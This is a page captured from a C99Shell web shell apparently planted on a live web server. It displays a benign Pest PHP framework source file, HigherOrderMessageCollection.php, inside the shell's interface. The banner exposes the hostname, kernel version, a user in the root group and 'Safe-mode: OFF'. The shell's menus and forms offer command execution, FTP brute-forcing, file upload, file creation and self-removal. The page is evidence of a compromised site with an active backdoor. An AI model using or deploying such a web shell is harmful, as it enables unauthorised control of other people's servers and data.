!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/pestphp/pest/src/Support/   drwxr-xr-x
Free 29.02 GB of 117.98 GB (24.6%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     HigherOrderMessageCollection.php (1.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Pest\Support;

/**
 * @internal
 */
final class HigherOrderMessageCollection
{
    
/**
     * @var array<int, HigherOrderMessage>
     */
    
private array $messages = [];

    
/**
     * Adds a new higher order message to the collection.
     *
     * @param  array<int, mixed>|null  $arguments
     */
    
public function add(string $filenameint $linestring $name, ?array $arguments): void
    
{
        
$this->messages[] = new HigherOrderMessage($filename$line$name$arguments);
    }

    
/**
     * Adds a new higher order message to the collection if the callable condition is does not return false.
     *
     * @param  array<int, mixed>|null  $arguments
     */
    
public function addWhen(callable $conditionstring $filenameint $linestring $name, ?array $arguments): void
    
{
        
$this->messages[] = (new HigherOrderMessage($filename$line$name$arguments))->when($condition);
    }

    
/**
     * Proxy all the messages starting from the target.
     */
    
public function chain(object $target): void
    
{
        foreach (
$this->messages as $message) {
            
// @phpstan-ignore-next-line
            
$target $message->call($target) ?? $target;
        }
    }

    
/**
     * Proxy all the messages to the target.
     */
    
public function proxy(object $target): void
    
{
        foreach (
$this->messages as $message) {
            
$message->call($target);
        }
    }

    
/**
     * Count the number of messages with the given name.
     *
     * @param  string  $name  A higher order message name (usually a method name)
     */
    
public function count(string $name): int
    
{
        return 
array_reduce(
            
$this->messages,
            static fn (
int $totalHigherOrderMessage $message): int => $total + (int) ($name === $message->name),
            
0,
        );
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--